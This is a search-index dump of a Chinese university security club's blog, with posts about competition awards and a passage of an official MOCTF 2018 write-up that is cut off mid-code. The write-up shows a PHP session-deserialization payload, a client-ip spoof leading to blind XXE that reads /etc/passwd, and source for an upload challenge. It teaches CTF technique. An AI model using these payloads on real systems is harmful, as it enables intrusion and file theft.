","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/0fbc0fc1-39e4-47ee-9cff-ba792b068f27/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e09\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956\u3001\u4e09\u7b49\u5956\u3001\u4f18\u80dc\u5956","text":"\u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e09\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d
\u3002
\u672c\u534f\u4f1a\u6d3e\u51fa\u7684\u4e09\u652f\u961f\u4f0d\u5206\u522b\u83b7\u5f97\u4e86\u4e00\u7b49\u5956\u3001\u4e09\u7b49\u5956\u548c\u4f18\u80dc\u5956\uff0c\u5176\u4e2dCodeMonster
\u6218\u961f\u5168\u7701\u7b2c\u4e09\u593a\u5f97\u4e00\u7b49\u5956
\uff0c\u83b7\u5f972000\u5143\u5956\u91d1\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/","title":"\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\u6210\u7acb","text":"\u672c\u534f\u4f1a\u6210\u7acb\u4e8e2016\u5e746\u67089\u65e5
\uff0c\u81f4\u529b\u4e8e\u5bf9\u4fe1\u606f\u5b89\u5168
\u65b9\u9762\u7684\u63a2\u7d22\u4e0e\u521b\u65b0\uff0c\u65e8\u5728\u4e3a\u6211\u6821\u70ed\u7231\u4fe1\u606f\u5b89\u5168\u7684\u540c\u5b66\u63d0\u4f9b\u4e00\u4e2a\u4ea4\u6d41\u5e73\u53f0\uff0c\u6269\u5927\u4fe1\u606f\u5b89\u5168\u5728\u6211\u6821\u7684\u5f71\u54cd\u529b\u3002
","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/#_1","title":"\u534f\u4f1a\u6d3b\u52a8","text":"\u672c\u534f\u4f1a\u901a\u8fc7\u53c2\u52a0CTF
\u7ade\u8d5b\u7684\u5f62\u5f0f\u9a8c\u8bc1\u81ea\u5df1\u7684\u4fe1\u606f\u5b89\u5168\u6280\u672f\u6c34\u5e73 \u5404\u4f4d\u5927\u4f6c\u548c\u840c\u65b0\u53ef\u4ee5\u53bb\u534f\u4f1aCodeMonster
\u6218\u961f\u4e0e\u96c6\u7f8e\u5927\u5b66\u4fe1\u5b89\u534f\u4f1a\u7684Mokirin
\u6218\u961f\u5171\u540c\u642d\u5efa\u7ef4\u62a4\u7684MOCTF\u5e73\u53f0\u8fdb\u884c\u65e5\u5e38CTF\u5237\u9898\u3002
","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/#ctf","title":"CTF\u4ecb\u7ecd","text":"CTF
\uff08Capture The Flag\uff09\u4e2d\u6587\u4e00\u822c\u8bd1\u4f5c\u593a\u65d7\u8d5b\uff0c\u5728\u7f51\u7edc\u5b89\u5168\u9886\u57df\u4e2d\u6307\u7684\u662f\u7f51\u7edc\u5b89\u5168\u6280\u672f\u4eba\u5458\u4e4b\u95f4\u8fdb\u884c\u6280\u672f\u7ade\u6280\u7684\u4e00\u79cd\u6bd4\u8d5b\u5f62\u5f0f\u3002CTF\u8d77\u6e90\u4e8e1996\u5e74DEFCON\u5168\u7403\u9ed1\u5ba2\u5927\u4f1a\uff0c\u4ee5\u4ee3\u66ff\u4e4b\u524d\u9ed1\u5ba2\u4eec\u901a\u8fc7\u4e92\u76f8\u53d1\u8d77\u771f\u5b9e\u653b\u51fb\u8fdb\u884c\u6280\u672f\u6bd4\u62fc\u7684\u65b9\u5f0f\u3002\u53d1\u5c55\u81f3\u4eca\uff0c\u5df2\u7ecf\u6210\u4e3a\u5168\u7403\u8303\u56f4\u7f51\u7edc\u5b89\u5168\u5708\u6d41\u884c\u7684\u7ade\u8d5b\u5f62\u5f0f\uff0c2013\u5e74\u5168\u7403\u4e3e\u529e\u4e86\u8d85\u8fc7\u4e94\u5341\u573a\u56fd\u9645\u6027CTF\u8d5b\u4e8b\u3002\u800cDEFCON\u4f5c\u4e3aCTF\u8d5b\u5236\u7684\u53d1\u6e90\u5730\uff0cDEFCON CTF\u4e5f\u6210\u4e3a\u4e86\u76ee\u524d\u5168\u7403\u6700\u9ad8\u6280\u672f\u6c34\u5e73\u548c\u5f71\u54cd\u529b\u7684CTF\u7ade\u8d5b\uff0c\u7c7b\u4f3c\u4e8eCTF\u8d5b\u573a\u4e2d\u7684\u201c\u4e16\u754c\u676f\u201d \u3002 CTF\u5927\u81f4\u6d41\u7a0b\u662f\uff0c\u53c2\u8d5b\u56e2\u961f\u4e4b\u95f4\u901a\u8fc7\u8fdb\u884c\u653b\u9632\u5bf9\u6297\u3001\u7a0b\u5e8f\u5206\u6790\u7b49\u5f62\u5f0f\uff0c\u7387\u5148\u4ece\u4e3b\u529e\u65b9\u7ed9\u51fa\u7684\u6bd4\u8d5b\u73af\u5883\u4e2d\u5f97\u5230\u4e00\u4e32\u5177\u6709\u4e00\u5b9a\u683c\u5f0f\u7684\u5b57\u7b26\u4e32\u6216\u5176\u4ed6\u5185\u5bb9\uff0c\u5e76\u5c06
","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6d1aa499-57ee-401b-a911-8062c6cae869/","title":"360\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u7b2c\u56db\u540d","text":"\u5317\u4eac\u65f6\u95f411\u670823\u65e5\uff0c\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u4e8e\u798f\u5dde\u6b63\u5f0f\u5f00\u6218\u3002\u4f5c\u4e3a\u4e00\u9879\u5bf9\u4ea7\u54c1\u5b89\u5168\u4e25\u683c\u8981\u6c42\u3001\u5411\u9ed1\u5ba2\u7cbe\u795e\u6781\u81f4\u8ffd\u9010\u3001\u7ed9\u4e88\u53c2\u8d5b\u9009\u624b\u9ad8\u989d\u5956\u52b1\u7684\u9ed1\u5ba2\u8d5b\u4e8b\uff0c\u672c\u5c4a\u9ed1\u5ba2\u9a6c\u62c9\u677e\u5438\u5f15\u4e86\u6765\u81ea\u5168\u56fd\u8fd110\u652f\u5b66\u751f\u9ed1\u5ba2\u6218\u961f\u53c2\u8d5b\uff0c\u5176\u4e2d\u5305\u62ec\u6765\u81ea\u53f0\u6e7e\u5730\u533a\u7684BambooFox\u548cTDOH\u4e24\u652f\u6218\u961f\u3002
48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u7531360\u5b89\u5168\u5e94\u6025\u54cd\u5e94\u4e2d\u5fc3\u4e3b\u529e\u7684\u9762\u5411360\u516c\u53f8IoT\u8bbe\u5907\u7684\u6f0f\u6d1e\u5956\u52b1\u8d5b\u4e8b\uff0c\u8bbe\u7f6e\u4e8636\u4e07\u4eba\u6c11\u5e01\u5956\u91d1\u6c60\uff0c\u5355\u4e2a\u6f0f\u6d1e\u5956\u52b1\u6700\u9ad8\u53ef\u8fbe5\u4e07\u5143\u3002
\u5c11\u5e74\u90ce\u5251\u8bd5\u5929\u4e0b\n
\u9ed1\u5ba2\u9a6c\u62c9\u677e\u6982\u5ff5\u6e90\u81ea\u7f8e\u56fd\uff0c\u5f53\u4e00\u7fa4\u9ad8\u624b\u4e91\u96c6\u4e00\u5802\uff0c\u4e92\u76f8\u6c9f\u901a\u548c\u5b66\u4e60\uff0c\u8fd9\u5c31\u6210\u4e86\u201d\u4e16\u754c\u4e0a\u6700\u9177\u7684\u6280\u672f\u72c2\u6b22\u201d\u3002\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u8d5b\u91c7\u7528\u4e8648\u5c0f\u65f6\u6781\u9650\u6f0f\u6d1e\u6316\u6398\u548c\u7834\u89e3\u76ee\u6807\u968f\u673a\u9009\u5b9a\u7684\u8d5b\u5236\uff0c\u53c2\u8d5b\u9009\u624b\u9700\u8981\u5728\u6bd4\u8d5b\u671f\u95f4\u8fde\u7eed\u4e0d\u4e2d\u65ad\u5730\u5bf9\u7279\u5b9a\u4ea7\u54c1\u8fdb\u884c\u6f0f\u6d1e\u6316\u6398\uff0c\u6bcf\u961f\u53ea\u914d\u5907\u4e00\u95f4\u4f11\u606f\u5ba4\u4ee5\u4f9b\u9009\u624b\u201c\u56de\u8840\u201d\u3002\u5728\u8fd9\u6837\u77ed\u7684\u65f6\u95f4\u5185\u5bfb\u627e\u7531\u5b89\u5168\u4eba\u5458\u53cd\u590d\u628a\u5173\u7684\u4ea7\u54c1\u6f0f\u6d1e\uff0c\u5e76\u975e\u6613\u4e8b\u3002\u4e0d\u8fc7\uff0c\u6ca1\u6709\u7edd\u5bf9\u5b89\u5168\u7684\u7cfb\u7edf\uff0c\u6211\u4eec\u4e5f\u5728\u671f\u5f85\u7740\u4ed6\u4eec\u7684\u7cbe\u5f69\u8868\u73b0\uff0c\u4e3a\u63d0\u5347360\u4ea7\u54c1\u5b89\u5168\u6027\u800c\u5927\u5c55\u8eab\u624b\uff01
\u9ed1\u4e0d\u662f\u76ee\u7684\uff0c\u5b89\u5168\u624d\u662f\u738b\u9053\n
360\u96c6\u56e2\u4f5c\u4e3a\u4e2d\u56fd\u9886\u5148\u7684\u4e92\u8054\u7f51\u7edc\u5b89\u5168\u4f01\u4e1a\uff0c\u6c47\u805a\u4e86\u56fd\u5185\u89c4\u6a21\u9886\u5148\u7684\u9ad8\u6c34\u5e73\u5b89\u5168\u6280\u672f\u56e2\u961f\uff0c\u79ef\u7d2f\u4e86\u63a5\u8fd1\u4e07\u4ef6\u539f\u521b\u6280\u672f\u548c\u6838\u5fc3\u6280\u672f\u7684\u4e13\u5229\uff0c\u5e76\u5728\u6b64\u57fa\u7840\u4e0a\u5f00\u53d1\u51fa\u62e5\u6709\u6570\u4ebf\u7528\u6237\u7684360\u5b89\u5168\u536b\u58eb\u3001360\u624b\u673a\u536b\u58eb\u7b49\u5b89\u5168\u4ea7\u54c1\uff0c\u540c\u65f6\u4e3a\u4e0a\u767e\u4e07\u5bb6\u56fd\u5bb6\u673a\u5173\u548c\u4f01\u4e8b\u4e1a\u5355\u4f4d\u63d0\u4f9b\u5305\u62ec\u5b89\u5168\u54a8\u8be2\u3001\u5b89\u5168\u8fd0\u7ef4\u3001\u5b89\u5168\u57f9\u8bad\u7b49\u5168\u65b9\u4f4d\u5b89\u5168\u670d\u52a1\u3002
\u6000\u63e3\u7528\u6237\u5b89\u5168\u7b2c\u4e00\u7684\u76ee\u7684\u548c\u51b3\u5fc3\uff0c48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u9080\u8bf7\u5230\u9ad8\u6821\u5b66\u751f\u5bf9\u6307\u5b9a\u4ea7\u54c1\u8fdb\u884c\u5168\u9762\u6f0f\u6d1e\u6316\u6398\uff0c\u8003\u9a8c\u7684\u4e0d\u4ec5\u4ec5\u662f\u4e66\u672c\u4e0a\u7684\u77e5\u8bc6\uff0c\u8fd8\u6709\u4e2a\u4eba\u7684\u6280\u672f\u5b9e\u529b\u4e0e\u56e2\u961f\u7684\u534f\u540c\u914d\u5408\u3002\u6bd4\u8d5b\u4e00\u65b9\u9762\u53ef\u4ee5\u63d0\u5347360\u4ea7\u54c1\u7684\u5b89\u5168\u6027\uff0c\u53e6\u4e00\u65b9\u9762\u5219\u80fd\u4fc3\u8fdb\u65b0\u751f\u4ee3\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u7684\u4ea4\u6d41\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u4ece\u4e1a\u8005\u7684\u6280\u672f\u6c34\u5e73\uff0c\u5171\u540c\u6253\u9020\u66f4\u5b89\u5168\u7684\u7f51\u7edc\u73af\u5883\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6eba13d5-1e74-4680-8a10-9c18763b6389/","title":"\u4e3e\u529e\u7b2c\u4e00\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b","text":"\u4e3a\u5e2e\u52a9\u5b66\u751f\u66f4\u597d\u5730\u611f\u77e5\u3001\u4e86\u89e3\u8eab\u8fb9\u7684\u7f51\u7edc\u5b89\u5168\u98ce\u9669\uff0c\u589e\u5f3a\u7f51\u7edc\u5b89\u5168\u610f\u8bc6\uff0c\u666e\u53ca\u7f51\u7edc\u5b89\u5168\u77e5\u8bc6\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u9632\u62a4\u6280\u80fd\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u8ba1\u7b97\u673a\u4e0e\u4fe1\u606f\u5de5\u7a0b\u5b66\u9662\u7279\u6b64\u4e3e\u529e\u201c\u56fd\u79d1\u676f\u201d\u7b2c\u4e00\u5c4a\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b
\uff0c\u4ee5\u6b64\u6380\u8d77\u5b66\u751f\u201c\u5171\u5efa\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u3001\u5171\u4eab\u7f51\u7edc\u6587\u660e\u5b66\u6821\u201d\u7684\u70ed\u6f6e\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6eba13d5-1e74-4680-8a10-9c18763b6389/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"\u6bd4\u8d5b\u6d77\u62a5\uff1a
\u6bd4\u8d5b\u73b0\u573a\uff1a
\u6bd4\u8d5b\u6392\u884c\u699c\uff1a
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e8c\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e8c\u7b49\u5956\u3001\u4e09\u7b49\u5956\u3001\u4f18\u80dc\u5956","text":"\u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e8c\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d
\u3002
\u672c\u534f\u4f1a\u6d3e\u51fa\u7684\u4e09\u652f\u961f\u4f0d\u5206\u522b\u83b7\u5f97\u4e86\u4e8c\u7b49\u5956\u3001\u4e09\u7b49\u5956\u548c\u4f18\u80dc\u5956\uff0c\u5176\u4e2dCodeMonster
\u6218\u961f\u5168\u7701\u7b2c\u516d\u593a\u5f97\u4e8c\u7b49\u5956
\uff0c\u83b7\u5f972000\u5143\u5956\u91d1\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"\u6bd4\u8d5b\u73b0\u573a\uff1a
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/#_2","title":"\u6bd4\u8d5b\u89c6\u9891","text":"\u6bd4\u8d5b\u89c6\u9891\uff1a
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/86e69101-77f4-484a-ba0e-2957afabbdb6/","title":"2018 \u5b89\u6052\u201c\u897f\u6e56\u8bba\u5251\u676f\u201d\u5168\u56fd\u5927\u5b66\u751f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4e2a\u4eba\u8d5b\u4e09\u7b49\u5956","text":"\u7531\u56fd\u5bb6\u4e92\u8054\u7f51\u4fe1\u606f\u529e\u516c\u5ba4\u7f51\u7edc\u5b89\u5168\u534f\u8c03\u5c40\u3001\u516c\u5b89\u90e8\u7f51\u7edc\u5b89\u5168\u4fdd\u536b\u5c40\u6307\u5bfc\uff0c\u6d59\u6c5f\u7701\u4e92\u8054\u7f51\u4fe1\u606f\u529e\u516c\u5ba4\u3001\u6d59\u6c5f\u7701\u516c\u5b89\u5385\u3001\u676d\u5dde\u5e02\u4eba\u6c11\u653f\u5e9c\u4e3b\u529e\uff0c\u676d\u5dde\u5e02\u7ecf\u6d4e\u548c\u4fe1\u606f\u5316\u59d4\u5458\u4f1a\u3001\u676d\u5dde\u5e02\u8427\u5c71\u533a\u4eba\u6c11\u653f\u5e9c\u3001\u676d\u5dde\u5b89\u6052\u4fe1\u606f\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u627f\u529e\uff0c\u676d\u5dde\u5e02\u6ee8\u6c5f\u533a\u4eba\u6c11\u653f\u5e9c\u3001\u4e2d\u56fd\u4fe1\u606f\u5b89\u5168\u6d4b\u8bc4\u4e2d\u5fc3\u3001\u56fd\u5bb6\u5de5\u4e1a\u4fe1\u606f\u5b89\u5168\u53d1\u5c55\u7814\u7a76\u4e2d\u5fc3\u3001\u56fd\u5bb6\u8ba1\u7b97\u673a\u7f51\u7edc\u5e94\u6025\u6280\u672f\u5904\u7406\u534f\u8c03\u4e2d\u5fc3\u3001\u963f\u91cc\u4e91\u8ba1\u7b97\u6709\u9650\u516c\u53f8\u3001\u676d\u5dde\u6d77\u5eb7\u5a01\u89c6\u6570\u5b57\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u3001\u6d59\u6c5f\u5927\u534e\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u8054\u5408\u627f\u529e\u7684\u897f\u6e56\u8bba\u5251\u2022\u7f51\u7edc\u5b89\u5168\u5927\u4f1a
\u5b9a\u6863\u4eca\u5e744\u670827\u65e5\uff0c\u897f\u6e56\u8bba\u5251\u676f
\u5168\u56fd\u5927\u5b66\u751f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4f5c\u4e3a\u672c\u6b21\u8bba\u575b\u4e2d\u6700\u53d7\u77a9\u76ee\u7684\u90e8\u5206\u4e4b\u4e00\uff0c\u4e5f\u5c06\u4e8e4\u670826\u65e5\u5f00\u542f\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/","title":"2018 \u7b2c\u5341\u4e00\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u5927\u8d5b \u4e09\u7b49\u5956\uff08\u534e\u4e1c\u5357\u8d5b\u533a\u7b2c4\u540d\uff09","text":"\u81ea\u5df1\u53bb\u770b\u5427 http://www.ciscn.cn/home
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/","title":"\u4e3e\u529e2018MOCTF\u65b0\u6625\u6b22\u4e50\u8d5b","text":"\u4ece\u653e\u5047\u5230\u73b0\u5728\u7b79\u529e\u51c6\u5907\u4e86\u63a5\u8fd1\u4e24\u4e2a\u661f\u671f\u7684MOCTF\u65b0\u6625\u6b22\u4e50\u8d5b\u7ec8\u4e8e\u843d\u5e55\u5566\uff0c\u8fd9\u6b21\u6bd4\u8d5b\u6211\u4e00\u5171\u51fa\u4e861\u7b7e\u5230+1MISC+3WEB\uff0c\u4e0b\u9762\u5148\u653e\u5b98\u65b9WriteUp\uff08\u54c7\u7ec8\u4e8e\u80fd\u5f53\u4e00\u56de\u5b98\u65b9\u4e86\uff09
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#_1","title":"\u7b7e\u5230","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#20","title":"\u7b7e\u5230 20","text":"\u652f\u4ed8\u5b9d\u4eca\u5e74\u96c6\u9f50\u4e94\u798f\u80fd\u4e00\u8d77\u5e73\u5206\u591a\u5c11\u94b1\uff1f\nflag\u683c\u5f0f\uff1amoctf{\u6570\u5b57}\n
flag:moctf{500000000}
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#misc","title":"MISC","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#word-100","title":"\u7a7aword 100","text":"\u771f\u7684\u4ec0\u4e48\u90fd\u6ca1\u6709\u5417\n
\u6587\u4ef6\u662f\u4e2aword \u6253\u5f00\u770b\u53d1\u73b0\u4e00\u4e9b\u5947\u602a\u7684\u6362\u884c\u548ctab \u5f88\u5bb9\u6613\u60f3\u5230\u662f\u6469\u65af\u5bc6\u7801\uff0c\u66ff\u6362\u540e\u5f97\u5230
-.... -.. -.... ..-. -.... ...-- --... ....- -.... -.... --... -... ....- ..--- -.... -.-. ...-- ....- -.... . -.... -... ..... ..-. ...-- ----- --... ..--- ..... ..-. --... ....- -.... .---- -.... ..--- ...-- ..-. --... -..\n
\u89e3\u6469\u65af\u5bc6\u7801\uff0c\u7136\u540ehex\u8f6c\u5b57\u7b26\u4e32\u5f97\u5230flag
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#web","title":"WEB","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#300","title":"\u767b\u5f55\u4e00\u54c8 300","text":"\u767b\u5f55\u4e00\u4e0b\uff0c\u4f60\u5c31\u77e5\u9053\u3002\nhttp://111.230.32.124:6001/\n
\u6e90\u7801\u653e\u5230git\u91cc\u6cc4\u9732\u7ed9\u5927\u5bb6\u4e86 index.php
<?php\n ini_set('session.serialize_handler', 'php_binary');\n session_start();\n\n if(isset($_POST['username']) && isset($_POST['password'])){\n $username = $_POST['username'];\n $password = $_POST['password'];\n $_SESSION[\"username\"] = $username;\n header(\"Location:./index.php\");\n }\n else if(isset($_SESSION[\"username\"])){\n echo '<h1>hello '.$_SESSION[\"username\"].'</h1>';\n }\n else ...\n
flag.php
<?php\nsession_start();\nclass MOCTF{\n public $flag;\n public $name;\n function __destruct(){\n $this->flag = \"moctf{xxxxxxxxxxxxxxxx}\";\n if($this->flag == $this->name){\n echo \"Wow,this is flag:\".$this->flag;\n }\n }\n}\n
\u770b\u6e90\u7801\u5c31\u53ef\u4ee5\u77e5\u9053\u8fd9\u9053\u9898\u8003\u67e5\u7684\u662fsession\u53cd\u5e8f\u5217\u6f0f\u6d1e\u4e86 \u5728index.php\u4e2dphp\u7684\u5e8f\u5217\u5316handler\u662f\u2019php_binary\u2019\uff0c\u800cflag.php\u91cc\u6ca1\u6709\u8bbe\u7f6e\uff0c\u5c31\u662f\u9ed8\u8ba4\u7684\u2019php\u2019
ini_set('session.serialize_handler', 'php_binary');\n
\u53c2\u8003https://blog.spoock.com/2016/10/16/php-serialize-problem/ index.php\u4e2d\u7684$_session['username']
\u53ef\u63a7\uff0c\u6211\u4eec\u5c31\u80fd\u6784\u9020payload\u5230session\uff0c \u7136\u540e\u8bbf\u95eeflag.php\u9875\u9762\u5c31\u80fd\u89e6\u53d1\u53cd\u5e8f\u5217\u5316\u6267\u884c__destruct
\u4e86\uff0c \u8fd9\u91cc\u8fd8\u6709\u4e2a\u8003\u70b9\u662f$this->flag == $this->name
\uff0c\u901a\u8fc7\u5f15\u7528\u7684\u65b9\u5f0f\u7ed5\u8fc7\u3002 \u6784\u9020payload
$a = new MOCTF();\n$a->name = &$a->flag;\necho '|'.serialize($a);\n
|O:5:\"MOCTF\":2:{s:4:\"flag\";N;s:4:\"name\";R:2;}\n
\u63d0\u4ea4\u5230index.php\u7684username\uff0c\u7136\u540e\u8bbf\u95eeflag.php\u5c31\u5f97\u5230flag\u4e86
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#400","title":"\u5b57\u7b26\u4e32\u68c0\u67e5 400","text":"\u6765\u68c0\u67e5\u4e00\u4e0b\u4f60\u7684\u5b57\u7b26\u4e32\u662f\u5426\u683c\u5f0f\u826f\u597d\u5427\uff01\nhttp://111.230.32.124:6002/\n
\u539f\u610f\u662fxxe\u6f0f\u6d1e\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6 \u540e\u6765\u77e5\u9053\u5e08\u5085\u4eec\u5361\u4e86\u5f88\u4e45\u8c8c\u4f3c\u662f\u56e0\u4e3aclient-ip
\u7684\u539f\u56e0\uff0c\u6211\u7684\u9505 \u9898\u76ee\u6253\u5f00\u662f\u4e2ajson\u5b57\u7b26\u4e32\u9a8c\u8bc1\u7684\u9875\u9762\uff0cPOST\u5305\u7684Content-Type
\u5b57\u6bb5\u662fapplication/json
\uff0c POST\u540e\u63a5\u53e3\u4f1a\u8fd4\u56dejson\u683c\u5f0f\u6b63\u786e\u6216\u9519\u8bef\u7684\u7ed3\u679c \u6539\u6210application/xml
\uff0c\u63a5\u53e3\u63d0\u793a\u53ea\u5141\u8bb8\u672c\u673a\u8bbf\u95ee\uff0c\u4e8e\u662f\u6784\u9020
client-ip:localhost\n
\u7136\u540e\u5c31\u662fxxe\u76f2\u6253\u6f0f\u6d1e\u4e86\uff0c\u53c2\u8003https://security.tencent.com/index.php/blog/msg/69 \u8fd9\u91cc\u6211\u53ea\u9650\u5236\u4e86payload\u957f\u5ea6\u4e3a170\u4ee5\u5185\uff0c\u5176\u5b9e\u5b8c\u5168\u53ef\u4ee5\u66f4\u77ed\u7684\uff0c\u5e0c\u671b\u5927\u4f6c\u4eec\u53ef\u4ee5\u6d4b\u8bd5\u6d4b\u8bd5 \u6700\u540eflag\u5728/etc/passwd
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#400_1","title":"\u7b80\u5355\u5ba1\u8ba1 400","text":"\u4ee3\u7801\u90fd\u7ed9\u4f60\u4e86\uff0c\u8fd8\u8bf4\u4e0d\u4f1a\u505a\uff1f\nhttp://120.78.57.208:6005/\n
index.php
<?php\nerror_reporting(0);\ninclude('config.php');\nheader(\"Content-type:text/html;charset=utf-8\");\nfunction get_rand_code($l = 6) {\n $result = '';\n while($l--) {\n $result .= chr(rand(ord('a'), ord('z')));\n }\n return $result;\n}\n\nfunction test_rand_code() {\n $ip=$_SERVER['REMOTE_ADDR'];\n $code=get_rand_code();\n $socket = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\n @socket_connect($socket, $ip, 8888);\n @socket_write($socket, $code.PHP_EOL);\n @socket_close($socket);\n die('test ok!');\n}\n\nfunction upload($filename, $content,$savepath) {\n $AllowedExt = array('bmp','gif','jpeg','jpg','png');\n if(!is_array($filename)) {\n $filename = explode('.', $filename);\n }\n if(!in_array(strtolower($filename[count($filename)-1]),$AllowedExt)){\n die('error ext!');\n }\n $code=get_rand_code();\n $finalname=$filename[0].'moctf'.$code.\".\".end($filename);\n file_put_contents(\"$savepath\".$finalname, $content);\n usleep(3000000);\n unlink(\"$savepath\".$finalname);\n die('upload over!');\n}\n\n$savepath=\"uploads/\".sha1($_SERVER['REMOTE_ADDR']).\"/\";\nif(!is_dir($savepath)){\n $oldmask = umask(0);\n mkdir($savepath, 0777);\n 